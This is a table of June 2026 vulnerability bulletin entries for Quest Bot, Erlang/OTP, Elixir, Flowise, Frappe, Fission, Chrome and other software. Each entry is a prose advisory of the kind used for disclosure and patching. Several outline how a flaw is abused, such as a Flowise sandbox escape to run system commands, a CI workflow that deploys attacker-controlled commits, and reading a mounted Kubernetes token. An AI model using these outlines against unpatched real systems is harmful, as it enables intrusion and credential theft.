| duck-organization--quest-bot | Quest Bot is an opensource modern Discord Bot built for moderation, utilities and support. Prior to version 1.0.3, a normal user can create a reminder whose message contains @everyone or @here. When the reminder triggers, the bot sends the stored message back into the channel without suppressing mass mentions. If the bot has permission to mention everyone, the reminder can ping the entire server or channel later. This issue has been patched in version 1.0.3. | 2026-06-11 | not yet calculated | CVE-2026-47171 |
| duck-organization--quest-bot | Quest Bot is an opensource modern Discord Bot built for moderation, utilities and support. Prior to version 1.0.3, the repository has a privileged deploy workflow that runs after the unprivileged build workflow completes. The build workflow runs on pull requests, and the deploy workflow checks out the triggering workflow's head_sha, builds that code into a Docker image, pushes it as latest, and triggers production deployment. If an attacker can open a pull request from a branch named main, the deploy workflow condition can treat the PR build as deployable and build the attacker-controlled commit in a privileged deployment context. This can result in malicious container deployment and production bot compromise. This issue has been patched in version 1.0.3. | 2026-06-11 | not yet calculated | CVE-2026-47172 |
| duck-organization--quest-bot | Quest Bot is an opensource modern Discord Bot built for moderation, utilities and support. Prior to version 1.0.3, a normal user can create a ticket with a reason containing @everyone, @here, user mentions, or role mentions. When the ticket is created, the bot posts the attacker-controlled reason into the new ticket channel without suppressing mentions. If the bot has permission to use those mentions, the attacker can make the bot ping staff or everyone with access to the ticket channel. This issue has been patched in version 1.0.3. | 2026-06-11 | not yet calculated | CVE-2026-47173 |
| duck-organization--quest-bot | Quest Bot is an opensource modern Discord Bot built for moderation, utilities and support. Prior to version 1.0.4, several moderation commands echo user-controlled reason text in public bot replies without disabling mention parsing. A moderator who does not have permission to mention everyone can still make the bot send @everyone or @here if the bot has that permission. This issue has been patched in version 1.0.4. | 2026-06-11 | not yet calculated | CVE-2026-47175 |
| duck-organization--quest-bot | Quest Bot is an opensource modern Discord Bot built for moderation, utilities and support. Prior to version 1.0.4, a user who can configure bot settings can enable logging and choose a logging channel they can read. The bot then logs deleted and edited message contents from every channel it can see, including private channels the configuring user cannot access. This issue has been patched in version 1.0.4. | 2026-06-11 | not yet calculated | CVE-2026-47176 |
| duck-organization--quest-bot | Quest Bot is an opensource modern Discord Bot built for moderation, utilities and support. Prior to version 1.0.4, a user who can configure bot settings can set the ticket transcript channel to a channel they can read. When tickets are closed, the bot exports the full ticket history and sends it to that configured transcript channel. This can expose private ticket messages to users who could not read the original ticket channel. This issue has been patched in version 1.0.4. | 2026-06-11 | not yet calculated | CVE-2026-47177 |
| duck-organization--quest-bot | Quest Bot is an opensource modern Discord Bot built for moderation, utilities and support. Prior to version 1.0.5, the latest release suppresses mentions in several moderation commands, but /unban and /unwarn still echo user-controlled reason text in public bot messages without allowedMentions. A moderator can use @everyone or @here in the reason and make the bot send a mass ping. This issue has been patched in version 1.0.5. | 2026-06-11 | not yet calculated | CVE-2026-47188 |
| duck-organization--quest-bot | Quest Bot is an opensource modern Discord Bot built for moderation, utilities and support. Prior to version 1.0.5, the AutoMod remove flow looks up and deletes rules by global database ID without verifying that the rule belongs to the guild where the command is executed. A user can learn a victim guild's AutoMod rule ID through autocomplete, then remove that rule from another guild where they have Manage Server. This issue has been patched in version 1.0.5. | 2026-06-11 | not yet calculated | CVE-2026-47189 |
| duck-organization--questbot | Quest Bot is an opensource Discord Bot. Prior to version 1.1.6, the purge and slowmode commands check only guild-level permissions on the invoking member. They do not check the member's effective permissions in the channel where the command is run. A user denied channel-level moderation permissions can still delete messages or change slowmode through the bot. This issue has been patched in version 1.1.6. | 2026-06-12 | not yet calculated | CVE-2026-47195 |
| duck-organization--questbot | Quest Bot is an opensource Discord Bot. Prior to version 1.1.6, the automod add command trims user input but does not reject an empty result. Adding a rule containing only whitespace stores an empty word. The message listener later checks content.includes(""), which is always true, causing the bot to delete every non-bot guild message. This issue has been patched in version 1.1.6. | 2026-06-12 | not yet calculated | CVE-2026-47196 |
| duck-organization--questbot | Quest Bot is an opensource Discord Bot. Prior to version 1.1.6, a moderator with the relevant Discord permission bit can use the bot to moderate users above them in the Discord role hierarchy, as long as the bot itself outranks the target. This bypasses Discord's normal role hierarchy protections and lets lower-ranked moderators ban, kick, timeout, untimeout, warn, or rename higher-ranked users. This issue has been patched in version 1.1.6. | 2026-06-12 | not yet calculated | CVE-2026-47197 |
| duck-organization--questbot | Quest Bot is an opensource Discord Bot. Prior to version 1.1.6, the latest release suppresses mentions when creating, unbanning, unwarning, kicking, muting, and unmuting, but stored warning reasons are still printed by /warns without mention suppression. A moderator can create a warning with @everyone or @here in the reason, then make the bot later output that reason through /warns, causing a mass ping if the bot has permission. This issue has been patched in version 1.1.6. | 2026-06-12 | not yet calculated | CVE-2026-48485 |
| duck-organization--questbot | Quest Bot is an opensource Discord Bot. Prior to version 1.1.8, any user who can access the ticket panel can repeatedly create new ticket channels. The latest release still creates a new database ticket and Discord channel for every completed ticket modal submission, without checking whether the same user already has an open ticket and without applying a cooldown. This issue has been patched in version 1.1.8. | 2026-06-12 | not yet calculated | CVE-2026-49347 |
| elixir-lang--elixir | Uncontrolled Resource Consumption vulnerability in the Elixir standard library's Version module allows an attacker who controls a version string to cause a denial of service through CPU and memory exhaustion. The version parser converts numeric version components (major, minor, patch and numeric pre-release/build identifiers) to integers without bounding their length. A single large all-digit component therefore forces a super-linear, non-yielding base-10 to arbitrary-precision integer conversion (String.to_integer/1, i.e. :erlang.binary_to_integer/1) that pins a BEAM scheduler, and a larger component raises an uncaught SystemLimitError that crashes the calling process. A single moderately sized string (around one megabyte) is enough; no authentication is required. This is reachable from the public entry points Version.parse/1, Version.parse!/1, Version.match?/3, Version.compare/2, and Version.parse_requirement/1, which applications routinely call on untrusted input such as HTTP parameters, dependency-manifest fields, and package metadata. This vulnerability is associated with program files lib/version.ex and program routines 'Elixir.Version.Parser':parse_digits/2. This issue affects Elixir: from 1.5.0 before 1.20.1. | 2026-06-09 | not yet calculated | CVE-2026-49762 |
| Erlang--OTP | Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Erlang OTP ssh (ssh_sftpd module) allows File Discovery. The SSH_FXP_READLINK handler in ssh_sftpd sends the raw result of file:read_link/2 to the client without calling chroot_filename/2 to strip the backend root prefix. An authenticated SFTP client can create a symlink inside the chroot pointing to /; ssh_sftpd resolves the target to the absolute backend root and stores it on disk. Reading the symlink back via SSH_FXP_READLINK returns that absolute path, for example /data/sftp, instead of the chrooted value /. The information disclosed is the absolute filesystem path of the SFTP root directory and of any symlink targets within it. No file contents, credentials, or access to paths outside the root directory are obtainable through this issue alone. This vulnerability is associated with program files lib/ssh/src/ssh_sftpd.erl. This issue affects OTP from OTP 17.0 before 29.0.2, 28.5.0.2 and 27.3.4.13 corresponding to ssh from 3.0.1 before 6.0.1, 5.5.2.1 and 5.2.11.8. | 2026-06-10 | not yet calculated | CVE-2026-48855 |
| Erlang--OTP | Sensitive Data Exposure vulnerability in Erlang OTP inets (httpc_response module) allows Retrieve Embedded Sensitive Data. The httpc client forwards the Authorization and Proxy-Authorization request headers to redirect targets without checking whether the redirect crosses an origin boundary. httpc_response:redirect/2 constructs the redirected request by updating only the host field of the header record; all other fields (including authorization and proxy_authorization) are copied verbatim. The redirect target host is never compared against the original host. autoredirect defaults to true, so this affects all httpc callers that do not explicitly disable automatic redirects. An attacker who controls a server that the victim contacts via httpc can issue a cross-origin 3xx redirect to a server they also control. The Authorization header (including Basic credentials derived from URL userinfo via httpc_request:handle_user_info/2) is forwarded to the redirect target, allowing credential theft. The same applies to the Proxy-Authorization header. This vulnerability is associated with program files lib/inets/src/http_client/httpc_response.erl. This issue affects OTP from 17.0 before 29.0.2, 28.5.0.2 and 27.3.4.13 corresponding to inets from 5.10 before 9.7.1, 9.6.2.2 and 9.3.2.6. | 2026-06-10 | not yet calculated | CVE-2026-48856 |
| Erlang--OTP | Server-Side Request Forgery (SSRF) vulnerability in Erlang/OTP ftp (ftp_internal module) allows FTP bounce attacks and SSRF via an unvalidated PASV response IP address. The ftp_internal:handle_ctrl_result/2 PASV handler (mode=passive, ipfamily=inet, ftp_extension=false) extracts the IP address from the server's 227 response and passes it directly to gen_tcp:connect/4 without validating it against the control connection peer address. The adjacent EPSV handlers correctly call peername(CSock) to derive the IP from the control connection, but the PASV handler does not. A malicious or compromised FTP server can redirect the client's data connection to an arbitrary internal host and port. On read operations (ftp:ls/1,2, ftp:nlist/1,2, ftp:recv/2,3), data from the redirected target is returned to the caller. On write operations (ftp:send/2,3, ftp:append/2,3), file content is sent to the redirected target. This enables SSRF against internal hosts, cloud metadata endpoints, and FTP bounce attacks against third-party hosts. The vulnerable path is the default configuration (mode=passive, ipfamily=inet, ftp_extension=false). RFC 2577 section 3 explicitly recommends validating the PASV response IP against the control connection peer. The ftp application is deprecated and scheduled for removal in OTP-30. This vulnerability is associated with program files lib/inets/src/ftp/ftp_internal.erl (inets 5.10.4 through 6.5, OTP 17.4 through 20.3) and lib/ftp/src/ftp_internal.erl (ftp 1.0 and later, OTP 21.0 and later). This issue affects OTP from OTP 17.4 before 29.0.2, 28.5.0.2 and 27.3.4.13 corresponding to inets from 5.10.4 before 7.0 and ftp from 1.0 before 1.2.6, 1.2.4.1 and 1.2.3.1. | 2026-06-10 | not yet calculated | CVE-2026-48858 |
| Erlang--OTP | Observable Timing Discrepancy vulnerability in Erlang/OTP ssh (ssh_auth, ssh_options modules) allows unauthenticated remote username enumeration via timing side-channel in password authentication. When the SSH daemon is configured with the user_passwords or password option, ssh_auth:check_password/3 performs a PBKDF2-SHA256 computation with 600,000 iterations (~300ms) for valid usernames, but returns immediately (~0ms) for invalid usernames via the ssh_options:get_password_option/2 path. This timing difference is detectable in a single authentication attempt and allows an unauthenticated attacker to distinguish valid from invalid usernames. The user_passwords and password options are documented as intended for test purposes; the recommended alternative is pwdfun, which is not affected by this vulnerability. This vulnerability is associated with program files lib/ssh/src/ssh_auth.erl and lib/ssh/src/ssh_options.erl. This issue affects OTP from OTP 29.0 before 29.0.2 corresponding to ssh from 6.0 before 6.0.1. | 2026-06-10 | not yet calculated | CVE-2026-48859 |
| Erlang--OTP | Reliance on IP Address for Authentication vulnerability in Erlang/OTP ssl (inet_tls_dist module) allows unauthenticated bypass of the distribution-over-TLS LAN allowlist. The inet_tls_dist:check_ip/1 function, which enforces a LAN allowlist for Erlang distribution over TLS, calls inet:sockname/1 instead of inet:peername/1 to obtain the peer's IP address. Because inet:sockname/1 returns the local socket address, both the local IP and the supposed peer IP resolve to the same value, causing the subnet mask comparison to always succeed regardless of the actual remote address. Any holder of a CA-signed TLS certificate can therefore bypass the LAN restriction and gain full Erlang distribution access to the node, including rpc:call/4 and code:load_binary/3. This vulnerability is associated with program file lib/ssl/src/inet_tls_dist.erl. This issue affects OTP from OTP 26.0 before 29.0.2, 28.5.0.2 and 27.3.4.13 corresponding to ssl from 11.0 before 11.7.2, 11.6.0.2 and 11.2.12.9. | 2026-06-10 | not yet calculated | CVE-2026-48860 |
| Erlang--OTP | Stack-based Buffer Overflow vulnerability in Erlang OTP erts (inet_drv) allows an unauthenticated remote attacker to crash the BEAM VM by sending a crafted SCTP ERROR chunk. The sctp_parse_error_chunk function in erts/emulator/drivers/common/inet_drv.c parses SCTP ERROR chunks and writes cause codes into a fixed-size stack-allocated ErlDrvTermData spec[] array without checking bounds. A remote attacker who has established an SCTP association to a listening port can send a single crafted SCTP ERROR chunk containing enough cause codes to overflow the stack buffer, crashing the VM. The attacker can only write 16-bit values interleaved with a fixed tag, so the overflow does not provide a controlled return address, limiting exploitation to Denial of Service. A crafted SCTP ERROR chunk may also leak bits and pieces of Erlang VM memory into the received error packet observed by the Erlang process. Such data is already readable by the user running the Erlang VM, so the disclosure scope is limited. This issue affects OTP from OTP 17.0 before 27.3.4.13, 28.5.0.2 and 29.0.2, corresponding to erts from 6.0 before 15.2.7.9, 16.4.0.2 and 17.0.2. | 2026-06-10 | not yet calculated | CVE-2026-49759 |
| Erlang--OTP | Stack-based Buffer Overflow vulnerability in Erlang OTP (erl_interface) allows Stack-based Buffer Overflow. This vulnerability is associated with program file lib/erl_interface/src/misc/ei_printterm.c and program routine ei_s_print_term. The C function ei_s_print_term uses an internal 2000-character stack buffer to format terms. When called with an encoded Erlang term containing a very large integer (encoded representation exceeding 2000 characters), the buffer overflows. The overflow bytes are restricted to the ASCII values of 0-9 and A-F, which limits exploitation to Denial of Service. The companion function ei_print_term, which prints directly to a FILE instead of a memory buffer, does not contain this bug. This issue affects OTP from OTP 17.0 before 27.3.4.13, 28.5.0.2 and 29.0.2, corresponding to erl_interface from 3.7.16 before 5.5.2.1, 5.7.0.1 and 5.8.1. | 2026-06-10 | not yet calculated | CVE-2026-49760 |
| ETHER--Catalyst::Plugin::Authentication | Catalyst::Plugin::Authentication versions before 0.10_027 for Perl are susceptible to session fixation attacks. Catalyst::Plugin::Authentication does not automatically change the session id after authentication. An attacker that obtains a session id cookie can use this to impersonate the victim. | 2026-06-09 | not yet calculated | CVE-2009-10007 |
| ethyca--fides | Fides is an open-source privacy engineering platform. From version 2.33.0 to before version 2.84.5, there is a DOM-based XSS vulnerability in fides.js via the fides_description override. This issue has been patched in version 2.84.5. | 2026-06-08 | not yet calculated | CVE-2026-44541 |
| Everpure--FlashArray | A flaw exists in the FlashArray Purity management interface where an authenticated low-privileged user may, under specific conditions, access functionality beyond their assigned privileges. | 2026-06-09 | not yet calculated | CVE-2026-6444 |
| Everpure--FlashArray | A flaw exists in FlashArray Purity where insufficient filtering of certain data paths could expose sensitive information to an authenticated user with low privileges. | 2026-06-09 | not yet calculated | CVE-2026-6445 |
| FastapiAdmin--FastapiAdmin | An uncaught exception in the /application/job/update/{id} endpoint of FastapiAdmin v2.2.0 allows authenticated attackers with the module_task:job:update permission to cause a Denial of Service (DoS) via manipulating the func field of scheduled tasks. | 2026-06-09 | not yet calculated | CVE-2026-36724 |
| FastapiAdmin--FastapiAdmin | A markdown based cross-site scripting (XSS) vulnerability in the /system/notice/create endpoint of FastapiAdmin v2.2.0 allows attackers to execute arbitrary web scripts or HTML via injecting a crafted payload into the notice_content parameter. | 2026-06-09 | not yet calculated | CVE-2026-36725 |
| FastapiAdmin--FastapiAdmin | A markdown based cross-site scripting (XSS) vulnerability in the AI assistant chat function of FastapiAdmin v2.2.0 allows attackers to execute arbitrary web scripts or HTML via injecting a crafted payload into a chat message. | 2026-06-09 | not yet calculated | CVE-2026-36728 |
| fission--fission | Fission is an open-source, Kubernetes-native serverless framework that simplifies the deployment of functions and applications on Kubernetes. Prior to version 1.23.0, Fission runtime pods were created with ServiceAccountName: fission-fetcher, and the fission-fetcher ServiceAccount was granted namespace-wide get on secrets and configmaps (it needs that to load function code, env vars, and config). The runtime pod's automounted token was reachable from inside the user's function container at /var/run/secrets/kubernetes.io/serviceaccount/token, so user-supplied function code inherited the same Kubernetes API privileges and could read any secret or configmap in the function's namespace - far beyond the Function.spec.secrets allowlist that the function specification suggests. This issue has been patched in version 1.23.0. | 2026-06-10 | not yet calculated | CVE-2026-46617 |
| fission--fission | Fission is an open-source, Kubernetes-native serverless framework that simplifies the deployment of functions and applications on Kubernetes. Prior to version 1.23.0, before the round-1 security sweep, pkg/builder/builder.go passed Environment.spec.builder.command directly into exec.Command(...) after a strings.Fields split, with no validation of the executable path or its arguments. A user who could create or update Environment CRDs in a namespace observed by the buildermgr could thereby point the builder pod at any executable inside the builder image (e.g. /bin/sh -c '...') and execute arbitrary code in the builder pod context. This issue has been patched in version 1.23.0. | 2026-06-10 | not yet calculated | CVE-2026-46618 |
| FlowiseAI--Flowise | Flowise is a drag & drop user interface to build a customized large language model flow. Prior to version 3.1.2, a mass assignment vulnerability exists in the variable update endpoint of FlowiseAI. The endpoint allows authenticated users to modify server-controlled properties such as workspaceId, createdDate, and updatedDate when updating a variable resource. Due to missing server-side validation and authorization checks, an attacker can manipulate the workspaceId field and reassign variables to arbitrary workspaces. This behavior may break tenant isolation in multi-workspace environments. This issue has been patched in version 3.1.2. | 2026-06-08 | not yet calculated | CVE-2026-42861 |
| FlowiseAI--Flowise | Flowise is a drag & drop user interface to build a customized large language model flow. Prior to version 3.1.2, a mass assignment vulnerability exists in the tool update endpoint of FlowiseAI. The endpoint allows authenticated users to modify server-controlled properties such as workspaceId, createdDate, and updatedDate when updating a tool resource. Due to missing server-side validation and authorization checks, an attacker can manipulate the workspaceId field and reassign tools to arbitrary workspaces. This breaks tenant isolation in multi-workspace environments. This issue has been patched in version 3.1.2. | 2026-06-08 | not yet calculated | CVE-2026-42862 |
| FlowiseAI--Flowise | Flowise is a drag & drop user interface to build a customized large language model flow. Prior to version 3.1.2, a mass assignment vulnerability exists in the chatflow update endpoint of FlowiseAI. The endpoint allows clients to modify server-controlled properties such as deployed, isPublic, workspaceId, createdDate, and updatedDate when updating a chatflow object. Due to missing server-side validation and authorization checks, an authenticated user can manipulate internal attributes of a chatflow and reassign it to another workspace. This allows cross-workspace resource reassignment and unauthorized modification of deployment and visibility settings. This issue has been patched in version 3.1.2. | 2026-06-08 | not yet calculated | CVE-2026-42863 |
| FlowiseAI--Flowise | Flowise is a drag & drop user interface to build a customized large language model flow. Prior to version 3.1.2, the checkBasicAuth endpoint validates credentials in plaintext without rate limiting and with direct comparison. This issue has been patched in version 3.1.2. | 2026-06-08 | not yet calculated | CVE-2026-46440 |
| FlowiseAI--Flowise | Flowise is a drag & drop user interface to build a customized large language model flow. Prior to version 3.1.2, a mass assignment vulnerability exists in the assistant update endpoint of FlowiseAI. The endpoint allows authenticated users to modify server-controlled properties such as workspaceId, createdDate, and updatedDate when updating an assistant resource. Due to missing server-side validation and authorization checks, an attacker can manipulate the workspaceId field and reassign assistants to arbitrary workspaces. This breaks tenant isolation in multi-workspace environments. This issue has been patched in version 3.1.2. | 2026-06-08 | not yet calculated | CVE-2026-46441 |
| FlowiseAI--Flowise | Flowise is a drag & drop user interface to build a customized large language model flow. Prior to version 3.1.2, POST /api/v1/node-custom-function lacks route-level authorization, allowing any authenticated user or API key to submit arbitrary JavaScript to the Custom JS Function node. When E2B_APIKEY is not configured - the common deployment case - Flowise executes this code inside a NodeVM sandbox. This sandbox can be escaped, allowing an attacker to reach the host process object and execute system commands via child_process. The result is authenticated remote code execution on the Flowise server host. This issue has been patched in version 3.1.2. | 2026-06-08 | not yet calculated | CVE-2026-46442 |
| FlowiseAI--Flowise | Flowise is a drag & drop user interface to build a customized large language model flow. Prior to version 3.1.2, when credentials are fetched with a credentialName filter parameter, the encryptedData field is not stripped from the response. The code properly omits encryptedData when no filter is used but fails to do so when a filter is used. This issue has been patched in version 3.1.2. | 2026-06-08 | not yet calculated | CVE-2026-46443 |
| FlowiseAI--Flowise | Flowise is a drag & drop user interface to build a customized large language model flow. Prior to version 3.1.2, all CRUD endpoints for OpenAI Assistants Vector Store have no authentication middleware and the route path /api/v1/openai-assistants-vector-store is not in WHITELIST_URLS. However, it is also not protected by the main auth middleware when accessed via API key - the route requires API key auth (not whitelisted), but no permission checks exist on any operation. This issue has been patched in version 3.1.2. | 2026-06-08 | not yet calculated | CVE-2026-46444 |
| FlowiseAI--Flowise | Flowise is a drag & drop user interface to build a customized large language model flow. Prior to version 3.1.2, assistant create and update mass-assignment allows cross-workspace assistant takeover. This issue has been patched in version 3.1.2. | 2026-06-08 | not yet calculated | CVE-2026-46475 |
| FlowiseAI--Flowise | Flowise is a drag & drop user interface to build a customized large language model flow. Prior to version 3.1.2, CustomTemplate create and update mass-assignment allows cross-workspace template takeover. This issue has been patched in version 3.1.2. | 2026-06-08 | not yet calculated | CVE-2026-46476 |
| FlowiseAI--Flowise | Flowise is a drag & drop user interface to build a customized large language model flow. Prior to version 3.1.2, dataset create and update mass-assignment allows cross-workspace dataset takeover. This issue has been patched in version 3.1.2. | 2026-06-08 | not yet calculated | CVE-2026-46477 |
| FlowiseAI--Flowise | Flowise is a drag & drop user interface to build a customized large language model flow. Prior to version 3.1.2, DatasetRow create and update mass-assignment allows cross-workspace row takeover. This issue has been patched in version 3.1.2. | 2026-06-08 | not yet calculated | CVE-2026-46478 |
| FlowiseAI--Flowise | Flowise is a drag & drop user interface to build a customized large language model flow. Prior to version 3.1.2, evaluation create and update mass-assignment allows cross-workspace evaluation takeover. This issue has been patched in version 3.1.2. | 2026-06-08 | not yet calculated | CVE-2026-46479 |
| FlowiseAI--Flowise | Flowise is a drag & drop user interface to build a customized large language model flow. Prior to version 3.1.2, evaluator create and update mass-assignment allows cross-workspace evaluator takeover. This issue has been patched in version 3.1.2. | 2026-06-08 | not yet calculated | CVE-2026-46480 |
| frappe--frappe | Frappe is a full-stack web application framework. Prior to versions 15.106.0 and 16.16.0, there is a possible SQL Injection via get_blog_list. This issue has been patched in versions 15.106.0 and 16.16.0. | 2026-06-12 | not yet calculated | CVE-2026-41581 |
| frappe--frappe | Frappe is a full-stack web application framework. Prior to version 15.106.0, a stored XSS vulnerability in the user profile image section allows an attacker to execute malicious scripts in the browsers of other users. This issue has been patched in version 15.106.0. | 2026-06-12 | not yet calculated | CVE-2026-44205 |
| frappe--frappe | Frappe is a full-stack web application framework. Prior to versions 15.107.2 and 16.17.4, DB Schema Enumeration is possible through exploiting an endpoint. This issue has been patched in versions 15.107.2 and 16.17.4. | 2026-06-12 | not yet calculated | CVE-2026-44206 |
| frappe--frappe | Frappe is a full-stack web application framework. Prior to versions 15.107.0 and 16.17.0, an IDOR vulnerability allows authenticated users to access other users' email configuration details. This issue has been patched in versions 15.107.0 and 16.17.0. | 2026-06-12 | not yet calculated | CVE-2026-44207 |
| frappe--frappe | Frappe is a full-stack web application framework. Prior to versions 15.107.0 and 16.17.0, lack of validations in the "submit_discussion()" endpoint allows for unauthorized access to resources. This issue has been patched in versions 15.107.0 and 16.17.0. | 2026-06-12 | not yet calculated | CVE-2026-44208 |
| frappe--frappe | Frappe is a full-stack web application framework. Prior to versions 15.107.2 and 16.17.4, any authenticated user can reset onboarding for all users in the system. This issue has been patched in versions 15.107.2 and 16.17.4. | 2026-06-12 | not yet calculated | CVE-2026-44975 |
| frappe--frappe | Frappe is a full-stack web application framework. Prior to version 16.17.4, any user can modify any field in any Onboarding Step record. This issue has been patched in version 16.17.4. | 2026-06-12 | not yet calculated | CVE-2026-44976 |
| frappe--frappe | Frappe is a full-stack web application framework. Prior to version 16.17.4, any authenticated user can access private files by guessing the file path. This issue has been patched in version 16.17.4. | 2026-06-12 | not yet calculated | CVE-2026-47182 |
| frappe--frappe | Frappe is a full-stack web application framework. Prior to versions 15.106.0 and 16.16.0, stored XSS in Note was possible due to lack of sanitization. This issue has been patched in versions 15.106.0 and 16.16.0. | 2026-06-12 | not yet calculated | CVE-2026-47739 |
| frappe--frappe | Frappe is a full-stack web application framework. Prior to versions 15.107.0 and 16.17.0, a lack of permission checks in these endpoints allowed unauthorized access to resources. This issue has been patched in versions 15.107.0 and 16.17.0. | 2026-06-12 | not yet calculated | CVE-2026-50026 |
| frappe--frappe | Frappe is a full-stack web application framework. Prior to versions 15.107.2 and 16.17.4, there is a stored XSS vulnerability in Frappe Report/List View. This issue has been patched in versions 15.107.2 and 16.17.4. | 2026-06-12 | not yet calculated | CVE-2026-53568 |
| frappe--lms | Frappe Learning Management System (LMS) is a learning system that helps users structure their content. Prior to version 2.53.0, an authenticated user could supply specially crafted content in certain user-editable fields that, when surfaced in page metadata, caused visitors' browsers to navigate to an attacker-chosen URL. This issue has been patched in version 2.53.0. | 2026-06-09 | not yet calculated | CVE-2026-46546 |
| GIMP--GIMP | GIMP HDR File Parsing Heap-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of GIMP. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of HDR files. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a heap-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-28618. | 2026-06-10 | not yet calculated | CVE-2026-2049 |
| Google Cloud--Dialogflow CX | A Missing Authorization vulnerability in the playbook import functionality in Dialogflow CX on Google Cloud Platform allows an authenticated user with specific roles to escalate privileges and potentially take over a GCP project using a maliciously crafted playbook import. This vulnerability was patched on 15 March 2026, and no customer action is needed. | 2026-06-11 | not yet calculated | CVE-2026-4764 |
| Google--Chrome | Use after free in Ozone in Google Chrome prior to 149.0.7827.103 allowed a local attacker to potentially exploit heap corruption via physical access to the device. (Chromium security severity: Critical) | 2026-06-08 | not yet calculated | CVE-2026-11628 |
| Google--Chrome | Use after free in Ozone in Google Chrome prior to 149.0.7827.103 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: Critical) | 2026-06-08 | not yet calculated | CVE-2026-11629 |
| Google--Chrome | Use after free in File Input in Google Chrome prior to 149.0.7827.103 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: Critical) | 2026-06-08 | not yet calculated | CVE-2026-11630 |
| Google--Chrome | Use after free in Aura in Google Chrome on Windows prior to 149.0.7827.103 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Critical) | 2026-06-08 | not yet calculated | CVE-2026-11631 |
| Google--Chrome | Use after free in TabStrip in Google Chrome prior to 149.0.7827.103 allowed a remote attacker who convinced a user to engage in specific UI gestures to execute arbitrary code via a crafted HTML page. (Chromium security severity: Critical) | 2026-06-08 | not yet calculated | CVE-2026-11632 |
| Google--Chrome | Use after free in Bluetooth in Google Chrome on Mac prior to 149.0.7827.103 allowed a remote attacker to execute arbitrary code via a malicious peripheral. (Chromium security severity: Critical) | 2026-06-08 | not yet calculated | CVE-2026-11633 |
| Google--Chrome | Use after free in Gamepad in Google Chrome on Windows prior to 149.0.7827.103 allowed a remote attacker to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Critical) | 2026-06-08 | not yet calculated | CVE-2026-11634 |
| Google--Chrome | Use after free in Bluetooth in Google Chrome on Mac prior to 149.0.7827.103 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Critical) | 2026-06-08 | not yet calculated | CVE-2026-11635 |
| Google--Chrome | Use after free in Autofill in Google Chrome on Windows prior to 149.0.7827.103 allowed a remote attacker who convinced a user to engage in specific UI gestures to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: Critical) | 2026-06-08 | not yet calculated | CVE-2026-11636 |
| Google--Chrome | Use after free in Views in Google Chrome on Mac prior to 149.0.7827.103 allowed a remote attacker to execute arbitrary code via a crafted HTML page. (Chromium security severity: Critical) | 2026-06-08 | not yet calculated | CVE-2026-11637 |
| Google--Chrome | Use after free in Printing in Google Chrome prior to 149.0.7827.103 allowed a remote attacker to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Critical) | 2026-06-08 | not yet calculated | CVE-2026-11638 |
| Google--Chrome | Use after free in Compositing in Google Chrome on Mac prior to 149.0.7827.103 allowed a remote attacker to execute arbitrary code via a crafted HTML page. (Chromium security severity: Critical) | 2026-06-08 | not yet calculated | CVE-2026-11639 |
| Google--Chrome | Integer overflow in libyuv in Google Chrome prior to 149.0.7827.103 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Critical) | 2026-06-08 | not yet calculated | CVE-2026-11640 |
| Google--Chrome | Use after free in Bluetooth in Google Chrome on Windows prior to 149.0.7827.103 allowed a remote attacker who convinced a user to engage in specific UI gestures to execute arbitrary code via a crafted HTML page. (Chromium security severity: Critical) | 2026-06-08 | not yet calculated | CVE-2026-11641 |
| Google--Chrome | Use after free in Web Apps in Google Chrome prior to 149.0.7827.103 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Critical) | 2026-06-08 | not yet calculated | CVE-2026-11642 |
| Google--Chrome | Use after free in Proxy in Google Chrome prior to 149.0.7827.103 allowed a remote attacker to execute arbitrary code via malicious network traffic. (Chromium security severity: Critical) | 2026-06-08 | not yet calculated | CVE-2026-11643 |
| Google--Chrome | Use after free in Views in Google Chrome on Linux prior to 149.0.7827.103 allowed an attacker who convinced a user to install a malicious extension to execute arbitrary code via a crafted Chrome Extension. (Chromium security severity: Critical) | 2026-06-08 | not yet calculated | CVE-2026-11644 |
| Google--Chrome | Out of bounds read and write in V8 in Google Chrome prior to 149.0.7827.103 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) | 2026-06-08 | not yet calculated | CVE-2026-11645 |
| Google--Chrome | Use after free in ViewTransitions in Google Chrome prior to 149.0.7827.103 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) | 2026-06-08 | not yet calculated | CVE-2026-11646 |
| Google--Chrome | Use after free in Printing in Google Chrome on Android prior to 149.0.7827.103 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-06-08 | not yet calculated | CVE-2026-11647 |
| Google--Chrome | Use after free in FullScreen in Google Chrome on Windows prior to 149.0.7827.103 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) | 2026-06-08 | not yet calculated | CVE-2026-11648 |
| Google--Chrome | Use after free in V8 in Google Chrome prior to 149.0.7827.103 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) | 2026-06-08 | not yet calculated | CVE-2026-11649 |
| Google--Chrome | Use after free in V8 in Google Chrome prior to 149.0.7827.103 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) | 2026-06-08 | not yet calculated | CVE-2026-11650 |
| Google--Chrome | Use after free in Network in Google Chrome prior to 149.0.7827.103 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) | 2026-06-08 | not yet calculated | CVE-2026-11651 |
